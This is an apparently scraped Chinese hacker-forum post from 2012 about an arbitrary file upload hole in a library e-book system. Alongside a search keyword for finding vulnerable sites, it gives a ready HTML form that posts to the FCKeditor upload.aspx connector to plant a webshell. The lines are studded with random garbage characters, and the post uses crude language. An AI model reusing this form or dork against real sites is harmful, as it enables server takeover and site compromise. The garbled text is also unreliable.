主题:图书馆系统任意文件上传漏洞
! X: j( w$ H; f2 ]. F% l* \ 作者:冰锋刺客4 S5 N' @' } N. V
厂商:点击书(dianjishu.com) N+ P* u+ E- f
日期:2012-6-21% `' K! @) c) D' D9 s: W7 R( Y
9 m; N8 Z! E ^/ q7 {5 [I 概述
* h7 |& r# K4 M5 u. k9 v) q 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
. F: \; ?) t4 I1 f. y6 j6 a; ` II 简介 G4 N3 x4 V ^+ N5 `. Y% D% T9 M
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
8 \, `( G* @3 g5 _* ?6 e; T 补充一个漏洞
% B* U* g5 E* _7 n( s' { <form id="frmUpload" enctype="multipart/form-data"
$ W5 Q7 R. N# y( _ action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
1 @/ f' f3 Y' H( i: N" k <input id="btnUpload" type="submit" value="操翻他">
7 k; F J& |" R3 Y) p2 R9 F </form>
5 _6 k: z0 H, q3 y" A; C9 V 你们懂的. F3 q) d6 p/ ]$ w9 }
那傻逼提供还需要改包.# [6 N. V: z% p% Y
自己看了下源代码发现fckeditor
/ f0 y' Q& r6 E" _" n# |+ { 直接秒杀& l" z" O0 U! P8 S/ {
|